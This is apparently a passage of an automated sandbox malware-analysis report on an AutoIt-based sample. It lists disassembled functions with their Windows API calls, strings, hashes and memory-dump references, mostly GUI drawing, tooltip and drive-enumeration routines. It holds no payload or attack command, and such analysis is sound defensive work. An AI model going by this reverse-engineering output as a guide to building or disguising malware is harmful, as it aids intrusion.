CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DF8
GlobalFree.KERNEL32(00000000), ref: 00847E03
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00862CAC,00000000), ref: 00847E2B
GlobalFree.KERNEL32(00000000), ref: 00847E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00847E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00847E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0084808F

Strings

, xrefs: 00848015
static, xrefs: 00847D8A, 00847EE1
AutoIt v3, xrefs: 00847D42
DISPLAY, xrefs: 00847EF2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$Global$Rect$CreateFile$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadMessagePictureReadSendShowSizeWire
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2547915802-2373415609
Opcode ID: 291f43992b5c737f68f91bc16eed3ea87f294060085d1f1e1f9fb01f5025a31e
Instruction ID: f786fdbb5e03db7da8f7cc793e71733d30aa96f8fc41e7c8ab1e312ee84cf928
Opcode Fuzzy Hash: 291f43992b5c737f68f91bc16eed3ea87f294060085d1f1e1f9fb01f5025a31e
Instruction Fuzzy Hash: DA026B71900209EFDB14DFA4CC89EAE7BB9FB48311F148159FA15EB2A1DB74AD01CB60

Function 008537F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0085F910), ref: 008538AF
IsWindowVisible.USER32(?), ref: 008538D3

Strings

SENDCOMMANDID, xrefs: 00853C62
GETCURRENTSELECTION, xrefs: 00853A6B
ADDSTRING, xrefs: 0085399E
TABRIGHT, xrefs: 00853925
UNCHECK, xrefs: 00853B0B
SELECTSTRING, xrefs: 00853A8E
SETCURRENTSELECTION, xrefs: 00853A3E
GETCURRENTCOL, xrefs: 00853BB0
GETLINECOUNT, xrefs: 00853B4E
FINDSTRING, xrefs: 008539FE
GETSELECTED, xrefs: 00853B2B
ISVISIBLE, xrefs: 008538BF
CHECK, xrefs: 00853AF5
TABLEFT, xrefs: 0085390F
ISCHECKED, xrefs: 00853AC1
ISENABLED, xrefs: 008538F3
EDITPASTE, xrefs: 00853BE7
SHOWDROPDOWN, xrefs: 00853968
CURRENTTAB, xrefs: 00853945
GETLINE, xrefs: 00853C23
GETCURRENTLINE, xrefs: 00853B75
DELSTRING, xrefs: 008539D1
HIDEDROPDOWN, xrefs: 00853988

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 3b540d6434b277fc7683248994f914abcced09f8badce2e35f82f2dbde7ad97f
Instruction ID: 5cf49d0168ce2882ce8bd174f34d875af2eec35902678ec1f387dd49ab7a4bcf
Opcode Fuzzy Hash: 3b540d6434b277fc7683248994f914abcced09f8badce2e35f82f2dbde7ad97f
Instruction Fuzzy Hash: BBD18030204319DBCB14EF64C455A6ABBA5FF95395F004458BD86DB3A3CB25EE4ECB82

Function 0085A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0085A89F
GetSysColorBrush.USER32(0000000F), ref: 0085A8D0
GetSysColor.USER32(0000000F), ref: 0085A8DC
SetBkColor.GDI32(?,000000FF), ref: 0085A8F6
SelectObject.GDI32(?,?), ref: 0085A905
InflateRect.USER32(?,000000FF,000000FF), ref: 0085A930
GetSysColor.USER32(00000010), ref: 0085A938
CreateSolidBrush.GDI32(00000000), ref: 0085A93F
FrameRect.USER32(?,?,00000000), ref: 0085A94E
DeleteObject.GDI32(00000000), ref: 0085A955
InflateRect.USER32(?,000000FE,000000FE), ref: 0085A9A0
FillRect.USER32(?,?,?), ref: 0085A9D2
GetWindowLongW.USER32(?,000000F0), ref: 0085A9FD

Part of subcall function 0085AB60: GetSysColor.USER32(00000012), ref: 0085AB99
Part of subcall function 0085AB60: SetTextColor.GDI32(?,?), ref: 0085AB9D
Part of subcall function 0085AB60: GetSysColorBrush.USER32(0000000F), ref: 0085ABB3
Part of subcall function 0085AB60: GetSysColor.USER32(0000000F), ref: 0085ABBE
Part of subcall function 0085AB60: GetSysColor.USER32(00000011), ref: 0085ABDB
Part of subcall function 0085AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0085ABE9
Part of subcall function 0085AB60: SelectObject.GDI32(?,00000000), ref: 0085ABFA
Part of subcall function 0085AB60: SetBkColor.GDI32(?,00000000), ref: 0085AC03
Part of subcall function 0085AB60: SelectObject.GDI32(?,?), ref: 0085AC10
Part of subcall function 0085AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0085AC2F
Part of subcall function 0085AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0085AC46
Part of subcall function 0085AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0085AC5B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 57a9de875d5f047123cc32394633e187029cd4e7ea5993bc0cfa15bf5044f19f
Instruction ID: 04972c9de144740cf65ecd5d4b0ed9732b457e4996b0e12149003ddf4afb489d
Opcode Fuzzy Hash: 57a9de875d5f047123cc32394633e187029cd4e7ea5993bc0cfa15bf5044f19f
Instruction Fuzzy Hash: 52A18072008315EFDB159F64DC48A6B7BA9FF88322F104B29FA62D61E1D735D844CB52

Function 008477BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 008477F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008478B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008478EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00847900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00847946
GetClientRect.USER32(00000000,?), ref: 00847952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00847996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008479A5
GetStockObject.GDI32(00000011), ref: 008479B5
SelectObject.GDI32(00000000,00000000), ref: 008479B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008479C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008479D2
DeleteDC.GDI32(00000000), ref: 008479DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00847A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00847A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00847A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00847A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00847A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00847AAE
GetStockObject.GDI32(00000011), ref: 00847AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00847AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00847ACE

Strings

msctls_progress32, xrefs: 00847A4F
static, xrefs: 00847990, 00847AA8
AutoIt v3, xrefs: 0084793E
DISPLAY, xrefs: 0084799B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 6d6deb42f4f58d38c91ccc76cc186aaaa17cff5f810a59b57cefe1a14b229881
Instruction ID: f6716578a6975c1f63bfd09290ff8b4adc0abd046cdf06ce50aef65d60c05fba
Opcode Fuzzy Hash: 6d6deb42f4f58d38c91ccc76cc186aaaa17cff5f810a59b57cefe1a14b229881
Instruction Fuzzy Hash: C4A18CB1A40209BFEB14ABA4DD4AFAE7BB9FB48711F044115FA14E72E1D774AD00CB64

Function 0083AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0083AF89
GetDriveTypeW.KERNEL32(?,0085FAC0,?,\\.\,0085F910), ref: 0083B066
SetErrorMode.KERNEL32(00000000,0085FAC0,?,\\.\,0085F910), ref: 0083B1C4

Strings

USB, xrefs: 0083B15B
MMC, xrefs: 0083B185
Network, xrefs: 0083B0A4
PhysicalDrive, xrefs: 0083B012
Removable, xrefs: 0083B0B8
SATA, xrefs: 0083B177
RAMDisk, xrefs: 0083B090
Fixed, xrefs: 0083B0AE
Unknown, xrefs: 0083B086, 0083B12A
ATAPI, xrefs: 0083B138
Virtual, xrefs: 0083B18C
\\.\, xrefs: 0083AFDB
RAID, xrefs: 0083B162
SCSI, xrefs: 0083B131
iSCSI, xrefs: 0083B169
CDROM, xrefs: 0083B09A
FileBackedVirtual, xrefs: 0083B193
SAS, xrefs: 0083B170
ATA, xrefs: 0083B13F
1394, xrefs: 0083B146
SSD, xrefs: 0083B0F1
Fibre, xrefs: 0083B154
SSA, xrefs: 0083B14D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 8c692232bf3395939d9068e6d7cac89aff07266d2c2c76dba1368e2409cf473f
Instruction ID: 40f79c13976a4d49fbc8449a18d589bd26a2a58817e23978c9f2e3b741d32374
Opcode Fuzzy Hash: 8c692232bf3395939d9068e6d7cac89aff07266d2c2c76dba1368e2409cf473f
Instruction Fuzzy Hash: 66519EB0680609ABDB08FB10C9A297D73B0FB94745F204016E65AE7391D7ADAD41EBC2

Function 007D6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 007D6A91
__wcsnicmp.LIBCMT ref: 007D6AA9
__wcsnicmp.LIBCMT ref: 007D6AC1
__wcsnicmp.LIBCMT ref: 007D6AD9
__wcsnicmp.LIBCMT ref: 007D6AF1
__wcsnicmp.LIBCMT ref: 007D6B09
__wcsnicmp.LIBCMT ref: 007D6B21
__wcsnicmp.LIBCMT ref: 007D6B35
__wcsnicmp.LIBCMT ref: 007D6B76
__wcsnicmp.LIBCMT ref: 007D6B8A
__wcsnicmp.LIBCMT ref: 007D6B9E
__wcsnicmp.LIBCMT ref: 007D6BB2

Strings

#notrayicon, xrefs: 007D6AA3
#include, xrefs: 007D6B03
#pragma compile, xrefs: 007D6A8B
#comments-end, xrefs: 007D6B98
Unterminated group of comments, xrefs: 0080E82C
#include-once, xrefs: 007D6AEB
Bad directive syntax error, xrefs: 0080E743
#cs, xrefs: 007D6B2F, 007D6B84
#ce, xrefs: 007D6BAC
#requireadmin, xrefs: 007D6ABB
Cannot parse #include, xrefs: 0080E819
#OnAutoItStartRegister, xrefs: 007D6AD3
#comments-start, xrefs: 007D6B1B, 007D6B70

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 1bb4ad8500d487cdda17333e37343603ab94fb8ec62231c1b97ad0c62d039f75
Instruction ID: f90b88827d15b31f8f67a0bfbb1db448bb7f6b79ec2a40cc5e41317bb75837b4
Opcode Fuzzy Hash: 1bb4ad8500d487cdda17333e37343603ab94fb8ec62231c1b97ad0c62d039f75
Instruction Fuzzy Hash: A281E9B0640615EACB24AB60CC86FBB7778FF14700F148026FE46EA3C2EB68DA45C651

Function 007D2C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 007D2CA2
DeleteObject.GDI32(00000000), ref: 007D2CE8
DeleteObject.GDI32(00000000), ref: 007D2CF3
DestroyCursor.USER32(00000000), ref: 007D2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 007D2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0080C68B
6FDC0200.COMCTL32(?,000000FF,?), ref: 0080C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0080CAED

Part of subcall function 007D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007D2036,?,00000000,?,?,?,?,007D16CB,00000000,?), ref: 007D1B9A

SendMessageW.USER32(?,00001053), ref: 0080CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0080CB41

Strings

0, xrefs: 0080C981

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$C0200CursorInvalidateMoveRect
String ID: 0
API String ID: 3497448939-4108050209
Opcode ID: 78aaf3cb854aef652207e849e51e84ff78f85f7432b6199d10c8f030540a5090
Instruction ID: 9521acc65012fa3b2ed1957f3aad5a38d1c220be8fca26706478c1e4121b35f1
Opcode Fuzzy Hash: 78aaf3cb854aef652207e849e51e84ff78f85f7432b6199d10c8f030540a5090
Instruction Fuzzy Hash: CE12AF30600201EFDB60CF24C988BA9BBF5FF55311F54466AE999DB2A2C735EC42DB61

Function 0085AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0085AB99
SetTextColor.GDI32(?,?), ref: 0085AB9D
GetSysColorBrush.USER32(0000000F), ref: 0085ABB3
GetSysColor.USER32(0000000F), ref: 0085ABBE
CreateSolidBrush.GDI32(?), ref: 0085ABC3
GetSysColor.USER32(00000011), ref: 0085ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0085ABE9
SelectObject.GDI32(?,00000000), ref: 0085ABFA
SetBkColor.GDI32(?,00000000), ref: 0085AC03
SelectObject.GDI32(?,?), ref: 0085AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 0085AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0085AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 0085AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0085ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0085ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 0085ACEC
DrawFocusRect.USER32(?,?), ref: 0085ACF7
GetSysColor.USER32(00000011), ref: 0085AD05
SetTextColor.GDI32(?,00000000), ref: 0085AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0085AD21
SelectObject.GDI32(?,0085A869), ref: 0085AD38
DeleteObject.GDI32(?), ref: 0085AD43
SelectObject.GDI32(?,?), ref: 0085AD49
DeleteObject.GDI32(?), ref: 0085AD4E
SetTextColor.GDI32(?,?), ref: 0085AD54
SetBkColor.GDI32(?,?), ref: 0085AD5E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 4785f8e9fd906dee3950f826d16e6a550333731ccb19d5a17824feed54c5a056
Instruction ID: c83b302e90298b17f1be68c5609946503f929c66e742a1451d61fdd8b56d1ed9
Opcode Fuzzy Hash: 4785f8e9fd906dee3950f826d16e6a550333731ccb19d5a17824feed54c5a056
Instruction Fuzzy Hash: 8A614E71900218EFDF159FA4DC48EAE7BB9FB08322F144225FA15AB2A2D7759D40DF90

Function 00858C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00858D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00858D45
CharNextW.USER32(0000014E), ref: 00858D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00858DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00858DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00858DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00858DF9
SetWindowTextW.USER32(?,0000014E), ref: 00858E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00858E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00858E8C
_memset.LIBCMT ref: 00858EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00858EFA
_memset.LIBCMT ref: 00858F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00858F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00858FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00859088
InvalidateRect.USER32(?,00000000,00000001), ref: 008590AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008590F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00859121
DrawMenuBar.USER32(?), ref: 00859130
SetWindowTextW.USER32(?,0000014E), ref: 00859158

Strings

0, xrefs: 008590C2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 3465ae8898f0d560791b05319548a2613910e140e255f19d38edf0ac4229813a
Instruction ID: 38e2586eeec0753e125ea23366f8b696de2838bff737e49195818d3f18000d8f
Opcode Fuzzy Hash: 3465ae8898f0d560791b05319548a2613910e140e255f19d38edf0ac4229813a
Instruction Fuzzy Hash: 5BE16F70900219EBDF209F54CC88AEE7BB9FF05715F10815AFE15EA291DB748A89DF60

Function 00854B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00854C51
GetDesktopWindow.USER32 ref: 00854C66
GetWindowRect.USER32(00000000), ref: 00854C6D
GetWindowLongW.USER32(?,000000F0), ref: 00854CCF
DestroyWindow.USER32(?), ref: 00854CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00854D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00854D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00854D68
SendMessageW.USER32(?,00000421,?,?), ref: 00854D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00854D90
IsWindowVisible.USER32(?), ref: 00854DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00854DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00854DDF
GetWindowRect.USER32(?,?), ref: 00854DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00854E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00854E37
CopyRect.USER32(?,?), ref: 00854E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00854EB9

Strings

(, xrefs: 00854E2A
0, xrefs: 00854BFC
tooltips_class32, xrefs: 00854D1D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
